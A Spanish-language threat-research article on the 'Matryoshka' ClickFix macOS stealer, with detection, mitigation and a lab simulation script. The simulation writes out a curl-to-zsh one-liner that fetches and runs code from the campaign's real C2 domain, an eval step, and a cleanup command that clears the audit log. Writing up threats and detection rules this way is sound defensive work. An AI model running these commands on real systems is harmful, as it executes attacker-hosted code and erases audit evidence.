SOC Prime Bias: Medio

17 Feb 2026 15:00 UTC

Desempaquetando la Nueva Variante “Matryoshka” ClickFix: Campaña de Typosquatting Entrega un Stealer para macOS

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Desempaquetando la Nueva Variante “Matryoshka” ClickFix: Campaña de Typosquatting Entrega un Stealer para macOS
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Una nueva operación de malware macOS denominada Matryoshka abusa de un dominio con errores tipográficos para engañar socialmente a las víctimas y que peguen un comando malicioso en Terminal. El comando de una línea obtiene un script codificado que se decodifica en la memoria y, finalmente, despliega un ladrón basado en AppleScript dirigido a las credenciales del navegador y billeteras de criptomonedas. El instalador se ejecuta silenciosamente en segundo plano, suprime la salida visible y sube los datos recolectados usando un encabezado API personalizado. La campaña es impulsada por la interacción del usuario en lugar de por una explotación de software.

Investigación

Los analistas de Intego reconstruyeron la cadena de extremo a extremo: un dominio con error tipográfico redirige a los usuarios a una fase de shell ligera alojada en barbermoo.xyz. Ese script realiza decodificación Base64 + gzip en memoria, ejecuta un cargador que recupera la carga útil de AppleScript y prepara los resultados de la colección en /tmp/osalogging.zip antes de la exfiltración. El AppleScript intenta robar credenciales presentando un mensaje falso de Preferencias del Sistema, y también apunta a herramientas de criptomonedas reemplazando o parcheando paquetes de aplicaciones de Ledger Live y Trezor Suite.

Mitigación

La concienciación del usuario es el control principal: no pegar comandos de Terminal desde sitios web. Bloquear y monitorear los dominios de error tipográfico identificados y relacionados con C2, así como la infraestructura de distribución de tráfico que apoya la entrega. Aplicar listas de aplicaciones permitidas y usar protección de endpoints que pueda detectar ejecuciones sospechosas de osascript y patrones de recuperación anómalos basados en curl.

Respuesta

Alertar sobre curl iniciado desde Terminal canalizado a zsh u osascript, monitorear la creación de /tmp/osalogging.zip, y marcar cambios inesperados a los paquetes de Ledger Live y Trezor Suite. Aplicar filtrado de DNS para barbermoo.xyz, comparisions.org y macfilesendstream.com. Investigar cualquier proceso que se inicie silenciosamente en segundo plano inmediatamente después de la ejecución de un comando impulsado por curl.

Flujo de Ataque

Ejecución de Simulación

Requisito previo: La Verificación de Telemetría y Línea de Base debe haber pasado.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.

  • Narrativa de Ataque y Comandos:
    Un adversario que ya ha comprometido una cuenta de macOS con privilegios bajos quiere ejecutar una carga útil remota sin escribir archivos en el disco. Elaboran un comando de una línea que obtiene un script codificado en base‑64 de un dominio de C2 malicioso (barbermoo.xyz), lo canaliza directamente a zsh, y finalmente usa eval para ejecutar la carga útil en memoria. Este enfoque se alinea con T1059.004 (shell de Unix) y T1027 (ofuscación) y es exactamente lo que la regla de Sigma está observando.

    1. El atacante obtiene un token único (ABCD1234) que vincula la solicitud a su campaña.

    2. Ejecutan el siguiente comando de una línea en una sesión de Terminal:

      curl -fsSL https://barbermoo.xyz/curl/ABCD1234 | zsh
    3. Dentro del script obtenido, una variable payload contiene una carga útil maliciosa codificada en base64, que es ejecutada a través de:

      eval "$payload"

    Esto genera dos entradas de línea de comando distintas que la regla coincide:

    • curl -fsSL https://barbermoo.xyz/curl/ABCD1234 | zsh
    • eval "$payload"
  • Script de Prueba de Regresión:
    El script a continuación reproduce el comportamiento malicioso en un entorno de laboratorio controlado. Ejecutarlo solo en un host de prueba macOS. Registra su propia ejecución en el registro de auditoría del sistema, satisfaciendo la regla de detección.

    #!/usr/bin/env bash
    # -------------------------------------------------
    # Simulación de Variante Matryoshka – activa la regla Sigma
    # -------------------------------------------------
    set -euo pipefail
    
    # --- Configuración -------------------------------------------------
    TOKEN="ABCD1234"                     # Reemplazar con cualquier cadena para simular unicidad
    MALICIOUS_URL="https://barbermoo.xyz/curl/${TOKEN}"
    # Una carga útil pequeña e inofensiva para demostración – eco de un mensaje (reemplazar con la carga útil real en prueba de equipo rojo)
    PAYLOAD="echo 'Carga útil maliciosa ejecutada'"
    
    # --- Paso 1: Obtener y canalizar a zsh (coincide con el primer patrón de detección) ---
    curl -fsSL "${MALICIOUS_URL}" | zsh
    
    # --- Paso 2: Simular eval en memoria (coincide con el segundo patrón) -------------
    # En un ataque real, la carga útil estaría codificada en base64 y decodificada al vuelo.
    eval "${PAYLOAD}"
  • Comandos de Limpieza: Remover cualquier proceso transitorio y restaurar el estado del shell.

    # Matar cualquier proceso zsh generado por la prueba (si todavía se está ejecutando)
    pkill -f "zsh -c .*barbermoo.xyz"
    
    # Opcionalmente limpiar el registro de auditoría de las entradas de prueba (requiere admin)
    sudo audit -c      # Vacía el búfer de auditoría (demuestra T1070.010)